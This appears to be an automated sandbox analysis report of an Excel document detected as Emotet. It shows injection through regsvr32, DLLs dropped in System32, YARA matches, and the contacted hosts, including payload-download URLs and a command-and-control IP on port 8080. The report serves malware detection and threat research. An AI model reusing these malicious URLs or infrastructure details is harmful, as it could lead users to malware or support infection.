Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_000007FEF70C3280
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF706BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000007FEF706BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7063280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_000007FEF7063280

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_000007FEF9D28900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation, 3_2_000007FEF9D28860

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 632101 Sample: Datei_26744565.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 10 other signatures 2->62 7 EXCEL.EXE 7 26 2->7         started        process3 dnsIp4 48 kolejleri.com 85.114.142.153, 49172, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 7->48 50 stainedglassexpress.com 66.71.247.68, 49173, 80 TOTAL-SERVER-SOLUTIONSUS United States 7->50 52 2 other IPs or domains 7->52 32 C:\Users\user\uxevr4.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr3.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr2.ocx, PE32+ 7->36 dropped 38 6 other malicious files 7->38 dropped 66 Document exploit detected (creates forbidden files) 7->66 68 Document exploit detected (UrlDownloadToFile) 7->68 12 regsvr32.exe 2 7->12         started        16 regsvr32.exe 2 7->16         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        file5 signatures6 process7 file8 40 C:\Windows\System32\...\fEKh.dll (copy), PE32+ 12->40 dropped 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->70 22 regsvr32.exe 12->22         started        42 C:\Windows\System32\...\pDnxsvRJXW.dll (copy), PE32+ 16->42 dropped 25 regsvr32.exe 2 16->25         started        44 C:\Windows\System32\...\Zazriwdkuo.dll (copy), PE32+ 18->44 dropped 28 regsvr32.exe 18->28         started        46 C:\Windows\System32\...\lwQjfM.dll (copy), PE32+ 20->46 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 64 System process connects to network (likely due to code injection or exploit) 22->64 54 165.22.73.229, 49175, 49177, 49178 DIGITALOCEAN-ASNUS United States 25->54 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.114.142.153
 kolejleri.com Germany
24961 MYLOC-ASIPBackboneofmyLocmanagedITAGDE true
103.171.181.223
 learnviaonline.com unknown
7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe false
107.189.3.39
 milanstaffing.com United States
53667 PONYNETUS false
165.22.73.229
 unknown United States
14061 DIGITALOCEAN-ASNUS true
66.71.247.68
 stainedglassexpress.com United States
46562 TOTAL-SERVER-SOLUTIONSUS false

Contacted Domains

Name IP Active
kolejleri.com 85.114.142.153 true
milanstaffing.com 107.189.3.39 true
learnviaonline.com 103.171.181.223 true
stainedglassexpress.com 66.71.247.68 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://learnviaonline.com/wp-admin/qGb/ true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://milanstaffing.com/images/D4TRnDubF/ true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://kolejleri.com/wp-admin/REvup/ true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown